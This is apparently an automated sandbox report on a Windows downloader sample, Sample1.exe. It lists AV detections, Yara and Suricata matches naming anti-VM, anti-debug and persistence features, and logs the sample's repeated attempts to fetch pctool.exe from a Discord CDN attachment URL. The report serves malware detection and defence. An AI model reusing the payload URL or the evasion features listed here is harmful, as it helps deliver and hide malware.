Edit tour

Windows Analysis Report
Sample1.exe

Overview

General Information

Sample name:	Sample1.exe
Analysis ID:	1591875
MD5:	45a47d815f2291bc7fc0112d36aaad83
SHA1:	db1dc02b2d64c4c3db89b5df3124dd87d43059d5
SHA256:	416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w11x64_office

Sample1.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\Sample1.exe" MD5: 45A47D815F2291BC7FC0112D36AAAD83)

SystemSettingsBroker.exe (PID: 1160 cmdline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding MD5: 899E65893CDEE7F9022DC9B583F94F0F)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Sample1.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Sample1.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0xbc2:$s1: Runner 0xc54:$s2: DownloadPayload 0xc64:$s3: RunOnStartup 0xbd6:$a1: Antis 0xc03:$a2: antiVM 0xc0a:$a3: antiSandbox 0xc16:$a4: antiDebug 0xc20:$a5: antiEmulator 0xc2d:$a6: enablePersistence 0xc3f:$a7: enableFakeError 0xc7f:$a8: DetectVirtualMachine 0xca4:$a9: DetectSandboxie 0xccf:$a10: DetectDebugger 0xcde:$a11: CheckEmulator

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Sample1.exe PID: 7448	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: Sample1.exe PID: 7448	JoeSecurity_GenericDownloader_4	Yara detected Generic Downloader	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T15:11:32.036088+0100	2803305	3	Unknown Traffic	192.168.2.25	49723	162.159.130.233	443	TCP
2025-01-15T15:13:19.348426+0100	2803305	3	Unknown Traffic	192.168.2.25	49747	162.159.130.233	443	TCP
2025-01-15T15:15:42.800221+0100	2803305	3	Unknown Traffic	192.168.2.25	49791	162.159.129.233	443	TCP
2025-01-15T15:15:48.409941+0100	2803305	3	Unknown Traffic	192.168.2.25	49792	162.159.129.233	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Sample1.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: Sample1.exe	Virustotal: Detection: 83%			Perma Link
Source: Sample1.exe	ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Sample1.exe

Joe Sandbox ML: detected

Source: Sample1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.25:49722 version: TLS 1.2

Source: Sample1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Yara detected Generic Downloader

Source: Yara match	File source: Process Memory Space: Sample1.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: Sample1.exe, type: SAMPLE

Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233
Source: Joe Sandbox View	IP Address: 162.159.129.233 162.159.129.233

Source: Joe Sandbox View

JA3 fingerprint: 6a5d235ee78c6aede6a61448b4e9ff1e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49723 -> 162.159.130.233:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49791 -> 162.159.129.233:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49792 -> 162.159.129.233:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49747 -> 162.159.130.233:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com

Source: global traffic

DNS traffic detected: DNS query: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:26 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=RtehIt2Hn3wj4kC_VZ1Q4r5Ip.0VLw6PiBHZQ4M74.M-1736950286-1.0.1.1-397DXNb23R4O8RANXPaHFJUn7ecw1GNDplitM99jMAB9Rv_L0C_0i0SpLeGZNykGSvdZTqFadjmAz.ycouCRhA; path=/; expires=Wed, 15-Jan-25 14:41:26 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBDyo3bgo1Apob3lSznADaL5nP3jaNnhYDV5LdKVagduzLugBtVmRxtc41NPvnSqiJyTDqSgUdone9pFcw4xVva3evO0qDlcSCLFMRa6y2a7EWbMGvRAkKdQJW%2FBM5w%2BwSGcPQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=_znWK6YLyRy.HpxcFyg9X3UEK_j_Vd36MEmQXjMMh5E-1736950286203-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267478af28429b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:31 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=Y1PLbA0aNHfRX8timujJXq9HYeGcIUWXG_BG0G9Kcow-1736950291-1.0.1.1-EUGc7ohCaXCvKSKUK6xLWpmjLgAMbq9KodoyviCrPjHclQuIVXFPSAYPSV2TuxHLN1hN8yqxH.bt7eVm27nExw; path=/; expires=Wed, 15-Jan-25 14:41:31 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AV7ioMBTH1Vx93LSQvwb5HnlJ4clvy8i3oNom3UxrgeEn9S28BBn0GXji99tUifIgQMqWfN8ojSshNkaydm0ZSBIj4GPZ%2FmpwNZpz9KC1gFpp%2FGg7gfhwLO%2BmhXLO%2FIYbjP%2FjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=gxrytAQHz6oEIXjQWKxJWQS60WwdUWpozY8atyttoPo-1736950291985-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026749cd8f84303-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:37 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=fcO6vXGc3Giom9Zc6i6ic3cmzA3FOOuaKqoDujmcLaM-1736950297-1.0.1.1-MMsEiig5bMfgcZdXgZ6EWtjHBwaOTCDL2.zUjWfBLc_u9PHsa8EYb6Uxqci1.i_tEA1J9AaZIyE5dUQHAsXj1w; path=/; expires=Wed, 15-Jan-25 14:41:37 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSdH8Kwakh%2BIpWaOBPXdMvaPJ8iB7NuoQ86%2B2I4g8YIWR1pGZMlIdqhLyxl%2B42%2BrqkGmN%2BA0YaS%2FHHiVYd6I9GRdBCL9S8YafmvFZZA%2F8vLeZ55jwdNKljQf6%2F4Q0Ui7ZMypXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=D_P_G3Y7ww.7dkxaSYyzLVgtmLtjOUnFUxDGGdsa9zY-1736950297594-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902674bfdd2d5e64-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:43 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=AV5p34qo3Za2oFT6_EtQjEZ.Ge3P1FfiVDN7mmOsNTg-1736950303-1.0.1.1-tYmoWiL3JnVuw0TJrcZnTp6yJA7j9Imedd50oBloS1OPi_pj.kWmjI_OSKbeyxLF0QRcozsxEK8XV7fbIiU3Bg; path=/; expires=Wed, 15-Jan-25 14:41:43 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmeUXp%2BhCXOLcjGY4vOg9xrFGci2a9pzQMfOTbflhNWXQyWD9q%2Fs6kVECcteQeNIeOiaDUW1VKFtxukobKBeLswjlRO47GTBCdAhMbUPq86X1byY5mb%2Fo57x4Dnu4yxsufGGgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=s9qRKpvw5rlW2AY0XZd5XEjXP5xkjLsC_KETlWNT8R4-1736950303256-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902674e33ae9c34b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=.UwaOIfSvOqC0BNKgnRAIPbVVYXJG7GF55UcIimMWMU-1736950308-1.0.1.1-LcSC1fXDS2mvTASZJ4Fj9hlX7jdESlKSH27vBTdlANVVkRDDdRlgqRtSspshxwBwVA1bZ.Oqm1IS8a_3b2prlQ; path=/; expires=Wed, 15-Jan-25 14:41:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZpMf9xwafHcgHAulJzqJq4kcp4pKhgcwd60ZBhgpnl43SI8dg8jQuoUcAGWk9kWb9JDNL%2BSfBP8r%2FUi1RHKhu6awnroGzw62BlqTBPilsYBkHjYJRK51kGOZPkPBBqK%2B8Ze7g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=tcoNsqgqPhxeuQ_RLU2DDdumuyMHvW1i1yM8dHz84nY-1736950308877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267506688d9e02-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:11:54 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=r5VfntsZIgao8TZ9Djx6xEAsEogsktL0RA0SLQB2_3o-1736950314-1.0.1.1-O1uUFzhHisTOsS0JrjBzbyRKHum9FuyOnHZfDSxz50N0uAmTLD505YLGP.BwoRYjagBHrE4Pu3rc9U4xh1kGow; path=/; expires=Wed, 15-Jan-25 14:41:54 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nL51iMvFoDwM4UukzKP2qsyiXCgfdmt43p%2B7PU0d6jOYWUlOMDLAhF%2BnhK1eCYGG68YHtTRDaF7cqm6hayokUbvpvSl9H1l5JxCZkpRU2tASxhsNjFLqEpsUJR%2FEesKw8kBrOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=SqsrD_iDXt4EqEdj4CO1LbgGAQoD6JtkNPDYh16s.7I-1736950314541-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902675296da20f83-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:00 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=1.70BF0SaeogAoPjj39ryc2vFOd5w4ImKwxhWsLDIEs-1736950320-1.0.1.1-AbNwzMlKdxRrxqSp78zkoX2ggQiWRzFBszReHRChGQZle5w4pftRgibEmROTEWD38_QhGNnKORf0oUlp1_rNRQ; path=/; expires=Wed, 15-Jan-25 14:42:00 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTdCX845tzse1Pa5mANgrK%2BdCNlFzno%2FBWNSXip5fhBMU6vSUvYsJNNkUcKKD8TVgUOpOjKxX6ro%2BqzAU9FL%2FVP0Oze%2B8t10vLoUagS9LnlOSxosPWwBfjjk1tZObyCbD11BzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: 